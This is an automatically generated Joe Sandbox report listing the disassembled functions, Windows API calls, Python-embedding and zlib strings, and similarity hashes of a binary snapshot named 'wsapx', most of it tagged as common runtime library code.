_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C82C1

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 362a469510fa405fcc22d39d849bdaad389b89e99b0702a8ebd5c86ae2d8e5eb
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 11E0C2A0E0C60783F7103EFA28C617994149FC5BA0FC04430ED18462C3DE2C684BC232

Function 00007FF7C71CEC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF7C71CB39A,?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA), ref: 00007FF7C71CEC5D

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: cccbe37436859df738cdab2794b81630fca69fc4e60cb135377515b58be32a98
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: AAF04950B5930683FE557FE278912B5C2985FD4FA0FEC5430C90E862D1EE2CE58A8634

Function 00007FF7C71CD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7C71C0D00,?,?,?,00007FF7C71C236A,?,?,?,?,?,00007FF7C71C3B59), ref: 00007FF7C71CD6AA

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 6fe09de0fc86655cb88ede0b83711b0c73477b4470f958b3ba79741fac8337df
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: E2F03A10A1966657FE657FE17842274E2904FD4FB0F880230DD6E856C1DE2CA442D630

Non-executed Functions

Function 00007FF7C71B5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5830
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5842
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5879
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B588B
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58A4
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58B6
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58CF
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58E1
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58FD
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B590F
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B592B
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B593D
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5959
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B596B
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5987
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5999
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59B5
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59C7

Strings

PyConfig_SetString, xrefs: 00007FF7C71B5A35, 00007FF7C71B5A57
PyConfig_SetWideStringList, xrefs: 00007FF7C71B5A63, 00007FF7C71B5A85
Py_PreInitialize, xrefs: 00007FF7C71B594F, 00007FF7C71B5971
PyConfig_InitIsolatedConfig, xrefs: 00007FF7C71B59AB, 00007FF7C71B59CD
PyUnicode_Replace, xrefs: 00007FF7C71B5FC7, 00007FF7C71B5FE9
PyModule_GetDict, xrefs: 00007FF7C71B5CB9, 00007FF7C71B5CDB
PyErr_NormalizeException, xrefs: 00007FF7C71B5AED, 00007FF7C71B5B0F
PyConfig_SetBytesString, xrefs: 00007FF7C71B5A07, 00007FF7C71B5A29
PyImport_ImportModule, xrefs: 00007FF7C71B5C2F, 00007FF7C71B5C51
PyStatus_Exception, xrefs: 00007FF7C71B5E29, 00007FF7C71B5E4B
PyErr_Fetch, xrefs: 00007FF7C71B5ABF, 00007FF7C71B5AE1
Failed to get address for %hs, xrefs: 00007FF7C71B5851
GetProcAddress, xrefs: 00007FF7C71B5858
PyUnicode_FromFormat, xrefs: 00007FF7C71B5F3D, 00007FF7C71B5F5F
PyObject_CallFunction, xrefs: 00007FF7C71B5CE7, 00007FF7C71B5D09
PyEval_EvalCode, xrefs: 00007FF7C71B5BA5, 00007FF7C71B5BC7
PySys_SetObject, xrefs: 00007FF7C71B5E85, 00007FF7C71B5EA7
PyImport_AddModule, xrefs: 00007FF7C71B5BD3, 00007FF7C71B5BF5
PyErr_Print, xrefs: 00007FF7C71B5B49, 00007FF7C71B5B6B
PyErr_Clear, xrefs: 00007FF7C71B5A91, 00007FF7C71B5AB3
PyObject_Str, xrefs: 00007FF7C71B5D9F, 00007FF7C71B5DC1
PyConfig_Read, xrefs: 00007FF7C71B59D9, 00007FF7C71B59FB
PyUnicode_Join, xrefs: 00007FF7C71B5F99, 00007FF7C71B5FBB
PyUnicode_DecodeFSDefault, xrefs: 00007FF7C71B5F0F, 00007FF7C71B5F31
PyUnicode_Decode, xrefs: 00007FF7C71B5EE1, 00007FF7C71B5F03
PyImport_ExecCodeModule, xrefs: 00007FF7C71B5C01, 00007FF7C71B5C23
Py_DecRef, xrefs: 00007FF7C71B5826, 00007FF7C71B5848
PyErr_Occurred, xrefs: 00007FF7C71B5B1B, 00007FF7C71B5B3D
Py_DecodeLocale, xrefs: 00007FF7C71B586F, 00007FF7C71B5891
PyUnicode_FromString, xrefs: 00007FF7C71B5F6B, 00007FF7C71B5F8D
PyRun_SimpleStringFlags, xrefs: 00007FF7C71B5DFB, 00007FF7C71B5E1D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7C71B5DCD, 00007FF7C71B5DEF
PyUnicode_AsUTF8, xrefs: 00007FF7C71B5EB3, 00007FF7C71B5ED5
PyConfig_Clear, xrefs: 00007FF7C71B597D, 00007FF7C71B599F
PyObject_GetAttrString, xrefs: 00007FF7C71B5D43, 00007FF7C71B5D65
PyErr_Restore, xrefs: 00007FF7C71B5B77, 00007FF7C71B5B99
PyMem_RawFree, xrefs: 00007FF7C71B5C8B, 00007FF7C71B5CAD
PyObject_CallFunctionObjArgs, xrefs: 00007FF7C71B5D15, 00007FF7C71B5D37
Py_Finalize, xrefs: 00007FF7C71B58C5, 00007FF7C71B58E7
Py_ExitStatusException, xrefs: 00007FF7C71B589A, 00007FF7C71B58BC
PySys_GetObject, xrefs: 00007FF7C71B5E57, 00007FF7C71B5E79
Py_InitializeFromConfig, xrefs: 00007FF7C71B58F3, 00007FF7C71B5915
PyObject_SetAttrString, xrefs: 00007FF7C71B5D71, 00007FF7C71B5D93
Py_IsInitialized, xrefs: 00007FF7C71B5921, 00007FF7C71B5943
PyMarshal_ReadObjectFromString, xrefs: 00007FF7C71B5C5D, 00007FF7C71B5C7F

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 7dec1d2d26a0ae70cfd4d748e6ddabc666cda4741c6470c63d478efb003596ed
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: E122C564949B4787FA16BF55B8945B4A3B1AFE8FB0FC45539C81F02260FF3CA14A9630

Function 00007FF7C71D411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7C71D416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D47D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D4C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D4E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D5067
memcpy_s.LIBCPMT ref: 00007FF7C71D5142
memcpy_s.LIBCPMT ref: 00007FF7C71D51ED
memcpy_s.LIBCPMT ref: 00007FF7C71D52BC

Strings

1#IND, xrefs: 00007FF7C71D4257
1#SNAN, xrefs: 00007FF7C71D427A
1#QNAN, xrefs: 00007FF7C71D4283
1#INF, xrefs: 00007FF7C71D4293

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 0f8a9671fc0babc612c46c306e5522249f545c2bae9a86e6f932317e6fe4f300
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: CAB2FA72A182828BE7269F65E4807FDB7A1FBA4B54F801135DE1D57A84DF3CA902CF50

Function 00007FF7C71BAD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid literal/length code, xrefs: 00007FF7C71BB452
too many length or distance symbols, xrefs: 00007FF7C71BAEB6
invalid code -- missing end-of-block, xrefs: 00007FF7C71BB136
invalid distances set, xrefs: 00007FF7C71BB210
invalid distance code, xrefs: 00007FF7C71BB624
invalid literal/lengths set, xrefs: 00007FF7C71BB1A3
invalid bit length repeat, xrefs: 00007FF7C71BB109
invalid code lengths set, xrefs: 00007FF7C71BAE9D
invalid distance too far back, xrefs: 00007FF7C71BB6E0

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: 5aa1c08e7a7f1f04a0f112e0cf622d39537dabbdea5d8ad6a0bd341d793eeca8
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 8D5227B2A146A58BD7A49F24E458B7D7BEDFB84710F414139EA4A83780DF3CE945CB10

Function 00007FF7C71BD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7C71BD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF7C71BD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C71BD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C71BD240
IsDebuggerPresent.KERNEL32 ref: 00007FF7C71BD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71BD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71BD2BC

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 6a104862ae6561733dc76e785dff575b3bbab90e2287dd45460b8c10d47dd31b
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 90311072618A8186EB649F60E8803EE7364FBD4B54F444439DA4E47B94EF3CD649CB20

Function 00007FF7C71D5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7C71D5CB5

Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C

Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

Part of subcall function 00007FF7C71CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA979
Part of subcall function 00007FF7C71CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA99E

_get_daylight.LIBCMT ref: 00007FF7C71D5CA4

Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C

_get_daylight.LIBCMT ref: 00007FF7C71D5F1A
_get_daylight.LIBCMT ref: 00007FF7C71D5F2B
_get_daylight.LIBCMT ref: 00007FF7C71D5F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 49fe52c0efb54c8bef4b2294bfeb5a3deef8481bdeba1ae34178854efd9d065f
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: F2D1A222A0825247E721FF25E8911B9E761FFE4FA4FC48136EA4D47695DF3CE4428B60

Function 00007FF7C71CA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7C71CA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C71CA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C71CA750
IsDebuggerPresent.KERNEL32 ref: 00007FF7C71CA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71CA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71CA79E

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 4acc949ff25e1604dcca31a8d6b788e127df6e90745df49047adb14a0e0792da
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: A7316336618B8186DB61DF25F8802AEB3A4FBD4B64F940135EA8D43B54EF3CD546CB10

Function 00007FF7C71D18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D1930
FindFirstFileExW.KERNEL32 ref: 00007FF7C71D1A3A

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: aaa7dcc27a9280f4d8e29648ee01561f93d4cbd44ea559ef0641044d97f803a7
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 2FB1D722B1868242EA62AF61B4401B9E3A1EBD4FF4FC54131ED4D07BC5EE3CE542DB10

Function 00007FF7C71D5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7C71D5F1A

Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C

_get_daylight.LIBCMT ref: 00007FF7C71D5F2B

Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C

_get_daylight.LIBCMT ref: 00007FF7C71D5F3C

Part of subcall function 00007FF7C71D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D564C

Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: a3afe653c8db7ed585f642b260b6afc0db9432d6872ccb6d41ed810dd9c4eac9
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: D8515432A1864287E721FF25F8C15A9E760BBD8FA4FC44135EA4D47696DF3CE4428B60

Function 00007FF7C71BD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7C71BD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF7C71BD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF7C71BD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF7C71BD0D6

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

